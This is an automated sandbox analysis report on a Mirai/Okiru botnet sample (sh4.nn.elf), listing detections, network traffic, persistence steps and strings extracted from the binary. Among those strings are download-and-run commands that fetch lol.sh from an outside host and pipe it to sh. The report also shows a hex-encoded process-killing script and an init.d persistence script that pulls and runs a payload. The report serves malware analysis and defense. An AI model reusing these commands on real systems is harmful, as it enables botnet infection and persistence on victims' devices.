Linux Analysis Report
sh4.nn.elf

Overview

General Information

Sample name: sh4.nn.elf
Analysis ID: 1561685
MD5: 08a8df7732cc53ff9f2bf89d7c38122e
SHA1: 2c6b642bba4c6ff989c06681e4bba9228392d8d2
SHA256: 2ca6ac713b3c724af98e3d8604a17d0a073287b4b488b090f4ad59c50afd34a9
Tags: elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru
Score: 88
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Drops files in suspicious directories
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Name Description Attribution Blogpost URLs Link
Mirai Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

AV Detection

barindex
Source: sh4.nn.elf Avira: detected
Source: sh4.nn.elf ReversingLabs: Detection: 44%
Source: sh4.nn.elf String: (deleted)/proc/self/exe/proc/%s/exe/proc/opendirtmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /tmp/./fd/socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/login193.143.1.70malloc[start_pid_hopping] Failed to clone: %s
Source: sh4.nn.elf String: incorrectinvalidbadwrongfaildeniederrorretryenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http://193.143.1.70/lol.sh -O- | sh;/bin/busybox tftp -g http://193.143.1.70/ -r lol.sh -l- | sh;/bin/busybox ftpget http://193.143.1.70/ lol.sh lol.sh && sh lol.sh;curl http://193.143.1.70/curl.sh -o- | shGET /dlr. HTTP/1.0
Source: global traffic TCP traffic: 192.168.2.23:38966 -> 154.216.19.139:199
Source: global traffic TCP traffic: 192.168.2.23:44344 -> 193.143.1.70:38242
Source: /tmp/sh4.nn.elf (PID: 6240) Socket: 0.0.0.0:38242 Jump to behavior
Source: global traffic TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 159.26.133.64
Source: unknown TCP traffic detected without corresponding DNS query: 193.143.1.70
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 54.155.42.30
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 185.152.17.122
Source: unknown TCP traffic detected without corresponding DNS query: 159.26.133.64
Source: unknown TCP traffic detected without corresponding DNS query: 193.143.1.70
Source: unknown TCP traffic detected without corresponding DNS query: 193.143.1.70
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 20.253.228.12
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown TCP traffic detected without corresponding DNS query: 165.38.191.130
Source: unknown TCP traffic detected without corresponding DNS query: 21.11.172.183
Source: unknown TCP traffic detected without corresponding DNS query: 97.96.24.62
Source: unknown TCP traffic detected without corresponding DNS query: 54.155.42.30
Source: unknown TCP traffic detected without corresponding DNS query: 19.146.79.254
Source: sh4.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, sh4.nn.elf.38.dr, bootcmd.12.dr, custom.service.12.dr String found in binary or memory: http://193.143.1.70/
Source: sh4.nn.elf String found in binary or memory: http://193.143.1.70/curl.sh
Source: sh4.nn.elf String found in binary or memory: http://193.143.1.70/lol.sh
Source: sh4.nn.elf String found in binary or memory: http://193.143.1.70/oro1vk
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: (deleted)/proc/self/exe/proc/%s/exe/proc/opendirtmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /tmp/./fd/socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//ro
Source: Initial sample String containing 'busybox' found: usage: busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://193.143.1.70/lol.sh -O- | sh;
Source: Initial sample String containing 'busybox' found: /bin/busybox tftp -g http://193.143.1.70/ -r lol.sh -l- | sh;
Source: Initial sample String containing 'busybox' found: /bin/busybox ftpget http://193.143.1.70/ lol.sh lol.sh && sh lol.sh;
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sample String containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http://193.143.1.70/lol.sh -O- | sh;/bin/busybox tftp -g http://193.143.1.70/ -r lol.sh -l- | sh;/bin/busybox ftpget http://193.143.1.70/ lol.sh lol.sh && sh lol.sh;curl http://193.143.1.70/curl.sh -o- | shGET /dlr. HTTP/1.0
Source: Initial sample String containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4
Source: ELF static info symbol of initial sample .symtab present: no
Source: /tmp/sh4.nn.elf (PID: 6256) SIGKILL sent: pid: 788, result: successful Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6256) SIGKILL sent: pid: 884, result: successful Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6256) SIGKILL sent: pid: 1664, result: successful Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6256) SIGKILL sent: pid: 2096, result: successful Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6256) SIGKILL sent: pid: 2102, result: successful Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6256) SIGKILL sent: pid: 6306, result: successful Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6256) SIGKILL sent: pid: 6312, result: successful Jump to behavior
Source: classification engine Classification label: mal88.spre.troj.evad.linELF@0/11@0/0

Persistence and Installation Behavior

barindex
Source: /tmp/sh4.nn.elf (PID: 6240) File: /etc/profile Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6240) File: /etc/rc.local Jump to behavior
Source: /usr/bin/ln (PID: 6329) File: /etc/rcS.d/S99system -> /etc/init.d/system Jump to behavior
Source: /usr/bin/ln (PID: 6368) File: /etc/rc.d/S99sh4.nn.elf -> /etc/init.d/sh4.nn.elf Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6240) File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 6325) File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 6354) File: /etc/init.d/sh4.nn.elf (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/6494/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/6493/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/6496/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/6495/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/6498/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/6497/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/6499/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/6492/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/6509/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/799/cmdline Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/6469/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/6502/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/6468/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/6501/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/6504/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/6503/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/6506/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/6505/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/6508/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/6507/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/6066/cmdline Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/6467/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/6500/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6393) File opened: /proc/6466/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6267) Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1" Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6323) Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1" Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6327) Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1" Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6330) Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh4.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh4.nn.elf'\n /tmp/sh4.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh4.nn.elf'\n killall sh4.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh4.nn.elf" Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6347) Shell command executed: sh -c "chmod +x /etc/init.d/sh4.nn.elf >/dev/null 2>&1" Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6355) Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6363) Shell command executed: sh -c "ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf >/dev/null 2>&1" Jump to behavior
Source: /bin/sh (PID: 6325) Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system Jump to behavior
Source: /bin/sh (PID: 6354) Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/sh4.nn.elf Jump to behavior
Source: /bin/sh (PID: 6360) Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d Jump to behavior
Source: /bin/sh (PID: 6287) Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6240) File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 6325) File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 6354) File: /etc/init.d/sh4.nn.elf (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6240) Writes shell script file to disk with an unusual file extension: /etc/init.d/system Jump to dropped file
Source: /tmp/sh4.nn.elf (PID: 6240) Writes shell script file to disk with an unusual file extension: /etc/rc.local Jump to dropped file
Source: /bin/sh (PID: 6330) Writes shell script file to disk with an unusual file extension: /etc/init.d/sh4.nn.elf Jump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/sh4.nn.elf (PID: 6240) File: /etc/init.d/system Jump to dropped file
Source: /bin/sh (PID: 6330) File: /etc/init.d/sh4.nn.elf Jump to dropped file
Source: /tmp/sh4.nn.elf (PID: 6240) Queries kernel information via 'uname': Jump to behavior
Source: sh4.nn.elf, 6240.1.00007fff7af49000.00007fff7af6a000.rw-.sdmp Binary or memory string: /qemu-open.XXXXX
Source: sh4.nn.elf, 6240.1.00007fff7af49000.00007fff7af6a000.rw-.sdmp Binary or memory string: /usr/bin/qemu-sh4
Source: sh4.nn.elf, 6240.1.000055805102f000.00005580510b3000.rw-.sdmp Binary or memory string: /usr/bin/vmtoolsd
Source: sh4.nn.elf, 6240.1.00007fff7af49000.00007fff7af6a000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-sh4/tmp/sh4.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/sh4.nn.elf
Source: sh4.nn.elf, 6240.1.00007fff7af49000.00007fff7af6a000.rw-.sdmp Binary or memory string: U/tmp/qemu-open.HneJv3
Source: sh4.nn.elf, 6240.1.000055805102f000.00005580510b3000.rw-.sdmp Binary or memory string: U5!/etc/qemu-binfmt/sh4
Source: sh4.nn.elf, 6240.1.000055805102f000.00005580510b3000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/sh4
Source: sh4.nn.elf, 6240.1.000055805102f000.00005580510b3000.rw-.sdmp Binary or memory string: U!/usr/bin/vmtoolsd
Source: sh4.nn.elf, 6240.1.00007fff7af49000.00007fff7af6a000.rw-.sdmp Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: sh4.nn.elf, 6240.1.00007fff7af49000.00007fff7af6a000.rw-.sdmp Binary or memory string: panel/wrapper-2./qemu-open.XXXXX
Source: sh4.nn.elf, 6240.1.00007fff7af49000.00007fff7af6a000.rw-.sdmp Binary or memory string: /tmp/qemu-open.HneJv3
Source: sh4.nn.elf, 6240.1.00007fff7af49000.00007fff7af6a000.rw-.sdmp Binary or memory string: /qemu-open.XXXXXSXPF

Stealing of Sensitive Information

barindex
Source: Yara match File source: sh4.nn.elf, type: SAMPLE
Source: Yara match File source: 6240.1.00007f01d0400000.00007f01d0419000.r-x.sdmp, type: MEMORY
Source: Yara match File source: sh4.nn.elf, type: SAMPLE
Source: Yara match File source: 6240.1.00007f01d0400000.00007f01d0419000.r-x.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: sh4.nn.elf PID: 6240, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: sh4.nn.elf, type: SAMPLE
Source: Yara match File source: 6240.1.00007f01d0400000.00007f01d0419000.r-x.sdmp, type: MEMORY
Source: Yara match File source: sh4.nn.elf, type: SAMPLE
Source: Yara match File source: 6240.1.00007f01d0400000.00007f01d0419000.r-x.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: sh4.nn.elf PID: 6240, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs